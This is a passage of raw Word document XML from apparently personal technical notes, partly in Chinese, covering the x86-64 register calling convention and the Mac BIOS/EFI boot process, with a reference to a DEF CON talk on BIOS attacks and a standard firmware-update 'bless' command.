          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00854D75" w:rsidRDefault="004106D2" w:rsidP="00854D75">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:hyperlink r:id="rId12" w:history="1">
        <w:r w:rsidR="00854D75" w:rsidRPr="00154E9A">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://weizhenwei.github.io/blog/2014/12/25/x86-64zhi-ling-he-abi/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="0062359A" w:rsidRDefault="0062359A" w:rsidP="0062359A">
      <w:pPr>
        <w:keepNext/>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="18FDBC68" wp14:editId="593194BB">
            <wp:extent cx="4356100" cy="255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6100" cy="2559050"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00854D75" w:rsidRDefault="0062359A" w:rsidP="0062359A">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="003D4234">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>5</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  Stack Frame with rbp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0062359A" w:rsidRDefault="0062359A" w:rsidP="00854D75">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r w:rsidRPr="0062359A">
        <w:t>函数调用的前</w:t>
      </w:r>
      <w:r w:rsidRPr="0062359A">
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidRPr="0062359A">
        <w:t>个参数通过寄存器传递，传递顺序为</w:t>
      </w:r>
      <w:r w:rsidRPr="00F36BA7">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>%rdi,%rsi,%rdx,%rcx,%r8,%r9</w:t>
      </w:r>
      <w:r w:rsidRPr="0062359A">
        <w:t>。超出部分的参数通过函数</w:t>
      </w:r>
      <w:r w:rsidRPr="0062359A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0062359A">
        <w:t>栈帧传递。</w:t>
      </w:r>
      <w:r w:rsidRPr="0062359A">
        <w:t>%rax</w:t>
      </w:r>
      <w:r w:rsidRPr="0062359A">
        <w:t>用作第一个函数返回值，</w:t>
      </w:r>
      <w:r w:rsidRPr="0062359A">
        <w:t>%rdx</w:t>
      </w:r>
      <w:r w:rsidRPr="0062359A">
        <w:t>用作第二个函数返回值。</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        <w:tblCellMar>
          <w:left w:w="0" w:type="dxa"/>
          <w:right w:w="0" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="947"/>
        <w:gridCol w:w="1008"/>
        <w:gridCol w:w="3763"/>
      </w:tblGrid>
      <w:tr w:rsidR="0062359A" w:rsidRPr="0062359A" w:rsidTr="0062359A">
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>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lastRenderedPageBreak/>
              <w:t>Register</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Callee Save</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Description</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ax</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result register, also used in idiv and imul</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bx</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yes</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miscellaneous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cx</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rPr>
                <w:b/>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>fourth</w:t>
            </w:r>
            <w:r w:rsidRPr="0062359A">
              <w:t xml:space="preserve"> argument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dx</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rPr>
                <w:b/>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>third</w:t>
            </w:r>
            <w:r w:rsidRPr="0062359A">
              <w:t xml:space="preserve"> argument register, also idiv and imul</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sp</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stack poin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bp</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yes</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frame poin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si</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rPr>
                <w:b/>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>second</w:t>
            </w:r>
            <w:r w:rsidRPr="0062359A">
              <w:t xml:space="preserve"> argument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di</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rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0062359A">
              <w:rPr>
                <w:b/>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>first argument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8</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rPr>
                <w:b/>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>fifth</w:t>
            </w:r>
            <w:r w:rsidRPr="0062359A">
              <w:t xml:space="preserve"> argument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9</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rPr>
                <w:b/>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>sixth</w:t>
            </w:r>
            <w:r w:rsidRPr="0062359A">
              <w:t xml:space="preserve"> argument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10</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miscellaneous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11</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no</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miscellaneous register</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0062359A" w:rsidRPr="0062359A" w:rsidTr="0062359A">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r12~%15</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jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="0062359A">
              <w:t>yes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="0062359A" w:rsidRPr="0062359A" w:rsidRDefault="0062359A" w:rsidP="0062359A">
            <w:pPr>
              <w:spacing w:after="0" w:line="414" w:lineRule="atLeast"/>
            </w:pPr>
            <w:r w:rsidRPr="0062359A">
              <w:t>miscellaneous registers</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="0062359A" w:rsidRPr="0062359A" w:rsidRDefault="0062359A" w:rsidP="0062359A">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
        <w:spacing w:after="360" w:line="414" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
      </w:pPr>
      <w:r w:rsidRPr="0062359A">
        <w:t>寄存器</w:t>
      </w:r>
      <w:r w:rsidRPr="0062359A">
        <w:t>%rbp</w:t>
      </w:r>
      <w:r w:rsidRPr="0062359A">
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="0062359A">
        <w:t>%rbx</w:t>
      </w:r>
      <w:r w:rsidRPr="0062359A">
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="0062359A">
        <w:t>%r12~%r15</w:t>
      </w:r>
      <w:r w:rsidRPr="0062359A">
        <w:t>是</w:t>
      </w:r>
      <w:r w:rsidRPr="0062359A">
        <w:t>callee-save</w:t>
      </w:r>
      <w:r w:rsidRPr="0062359A">
        <w:t>的，也即由被调用函数保存。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0062359A" w:rsidRDefault="001F74D8" w:rsidP="001F74D8">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Toc445313209"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Mac boot</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F3646E" w:rsidRDefault="00F3646E" w:rsidP="00F3646E">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc445313210"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Overview</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00240294" w:rsidRDefault="00240294" w:rsidP="00240294">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="65775AF9" wp14:editId="2EE9F386">
            <wp:extent cx="4622800" cy="4184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2800" cy="4184650"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00240294" w:rsidRDefault="00240294" w:rsidP="00240294">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="003D4234">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>6</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Attack surface</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00240294" w:rsidRDefault="00240294" w:rsidP="00240294">
      <w:r w:rsidRPr="004D6690">
        <w:t>Summary of Attacks Against-DEFCON-22-Bulygin-Bazhaniul-Furtak-Loucaides-Summary-of-attacks-against-BIOS.pdf</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00240294" w:rsidRDefault="00E70373" w:rsidP="00240294">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="73D5ABAF" wp14:editId="0ECC1F88">
            <wp:extent cx="4740051" cy="4107536"/>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0051" cy="4107536"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E70373" w:rsidRDefault="00E70373" w:rsidP="00E70373">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>7 High level overview of startup</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E70373" w:rsidRPr="00240294" w:rsidRDefault="00E70373" w:rsidP="00240294"/>
    <w:p w:rsidR="00F3646E" w:rsidRDefault="00F3646E" w:rsidP="00F3646E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc445313211"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>BIOS</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p w:rsidR="00F3646E" w:rsidRPr="00F3646E" w:rsidRDefault="00F3646E" w:rsidP="00F3646E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="425" w:firstLine="284"/>
      </w:pPr>
      <w:r w:rsidRPr="00F3646E">
        <w:t>Legacy BIOS</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1. CPU Reset vector in BIOS </w:t>
      </w:r>
      <w:r w:rsidRPr="00F3646E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
      <w:r w:rsidRPr="00F3646E">
        <w:t>ROM</w:t>
      </w:r>
      <w:r w:rsidRPr="00F3646E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
      <w:r w:rsidRPr="00F3646E">
        <w:t xml:space="preserve"> (Boot Block)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2. Basic CPU, chipset initialization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3. Initialize Cache-as-RAM, load and run from cache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4. Initialize DIMMs, create address map..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5. Enumerate PCIe devices..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6.</w:t>
      </w:r>
      <w:r w:rsidRPr="00F3646E">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> Execute Option ROMs </w:t>
      </w:r>
      <w:r w:rsidRPr="00F3646E">
        <w:t xml:space="preserve">on expansion cards </w:t>
      </w:r>
      <w:r w:rsidRPr="00F3646E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>􀃆</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F3646E" w:rsidRPr="00F3646E" w:rsidRDefault="00F3646E" w:rsidP="00F3646E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="425"/>
      </w:pPr>
      <w:r w:rsidRPr="00F3646E">
        <w:t xml:space="preserve">7. Load and execute </w:t>
      </w:r>
      <w:r w:rsidRPr="00F3646E">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>MBR</w:t>
      </w:r>
      <w:r w:rsidRPr="00F3646E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F3646E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>􀃆</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F3646E" w:rsidRPr="00F3646E" w:rsidRDefault="00F3646E" w:rsidP="00F3646E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="425"/>
      </w:pPr>
      <w:r w:rsidRPr="00F3646E">
        <w:t xml:space="preserve">8. 2nd Stage Boot Loader </w:t>
      </w:r>
      <w:r w:rsidRPr="00F3646E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>􀃆</w:t>
      </w:r>
      <w:r w:rsidRPr="00F3646E">
        <w:t xml:space="preserve"> OS Loader </w:t>
      </w:r>
      <w:r w:rsidRPr="00F3646E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>􀃆</w:t>
      </w:r>
      <w:r w:rsidRPr="00F3646E">
        <w:t xml:space="preserve"> OS kernel</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F3646E" w:rsidRPr="006B4005" w:rsidRDefault="00F3646E" w:rsidP="00F3646E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Toc445313212"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>EFI</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p w:rsidR="00F3646E" w:rsidRDefault="00F3646E" w:rsidP="00F3646E">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1FDA6F70" wp14:editId="19F1E9C4">
            <wp:extent cx="5274310" cy="371521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15214"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F3646E" w:rsidRDefault="00F3646E" w:rsidP="00F3646E">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="003D4234">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>7</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Windows EFI </w:t>
      </w:r>
      <w:r>
        <w:t>–</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Signed BIOS update </w:t>
      </w:r>
      <w:r>
        <w:t>–</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Secure boot</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004D6690" w:rsidRDefault="004D6690" w:rsidP="004D6690">
      <w:r w:rsidRPr="004D6690">
        <w:t>Summary of Attacks Against-DEFCON-22-Bulygin-Bazhaniul-Furtak-Loucaides-Summary-of-attacks-against-BIOS.pdf</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DD2040" w:rsidRDefault="00DD2040" w:rsidP="00DD2040">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">.scap file </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DD2040" w:rsidRDefault="00DD2040" w:rsidP="004D6690">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="3B3B3B"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="3B3B3B"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        </w:rPr>
        <w:t>SCAP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="3B3B3B"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        </w:rPr>
        <w:t>是由使用的可扩展固件接口或统一</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="3B3B3B"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        </w:rPr>
        <w:t>EFI</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="3B3B3B"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        </w:rPr>
        <w:t>规范计算机上的固件文件。它包含低层次的计划，引导和加载机，通常包括在固件更新。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI" w:hint="eastAsia"/>
          <w:color w:val="3B3B3B"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DD2040" w:rsidRDefault="00DD2040" w:rsidP="00DD2040">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Unpack </w:t>
      </w:r>
      <w:r w:rsidRPr="00DD2040">
        <w:t>MacminiEFIUpdate.pkg</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DD2040" w:rsidRPr="00DD2040" w:rsidRDefault="00DD2040" w:rsidP="004D6690"/>
    <w:p w:rsidR="004D6690" w:rsidRDefault="00DD2040" w:rsidP="004D6690">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>\</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD2040">
        <w:t>Library\CoreServices\Firmware Updates\MacMiniEFIUpdate-1.5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>\</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD2040">
        <w:t xml:space="preserve"> MM41_0042_03B_LOCKED.</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD2040">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>scap</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DD2040" w:rsidRDefault="00DD2040" w:rsidP="004D6690"/>
    <w:p w:rsidR="00DD2040" w:rsidRPr="004D6690" w:rsidRDefault="00DD2040" w:rsidP="004D6690">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
        <w:t>user@mac</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666666"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
        <w:t>:~$ sudo bless -mount / -firmware /Applications/Utilities/MacBook EFI Firmware Update.app/Contents/MB51_007D_03B_LOCKED</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD2040">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
        <w:t>.scap</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00314D7D" w:rsidRDefault="000B2BB8" w:rsidP="001F74D8">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_Toc445313213"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>The early boot process</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
      <w:r w:rsidR="00314D7D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00741781" w:rsidRPr="006B4005" w:rsidRDefault="00741781" w:rsidP="001F74D8">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_Toc445313214"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>EFI</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:p w:rsidR="00F3646E" w:rsidRDefault="00741781" w:rsidP="00F3646E">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidR="00F3646E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="324D1ABE" wp14:editId="5307C576">
            <wp:extent cx="5274310" cy="299304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93049"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F3646E" w:rsidRDefault="00F3646E" w:rsidP="00F3646E">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="003D4234">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>8</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Early boot</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00741781" w:rsidRDefault="00741781" w:rsidP="00741781"/>
    <w:p w:rsidR="00741781" w:rsidRPr="00741781" w:rsidRDefault="00741781" w:rsidP="00741781"/>
    <w:p w:rsidR="000349AA" w:rsidRDefault="000349AA" w:rsidP="000349AA">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6C2F22EC" wp14:editId="675B9684">
            <wp:extent cx="5274310" cy="5762672"/>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762672"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00464C53" w:rsidRDefault="000349AA" w:rsidP="000349AA">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="003D4234">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>9</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Boot OS from UEFI</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BE1A31" w:rsidRDefault="00BE1A31" w:rsidP="00BE1A31">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
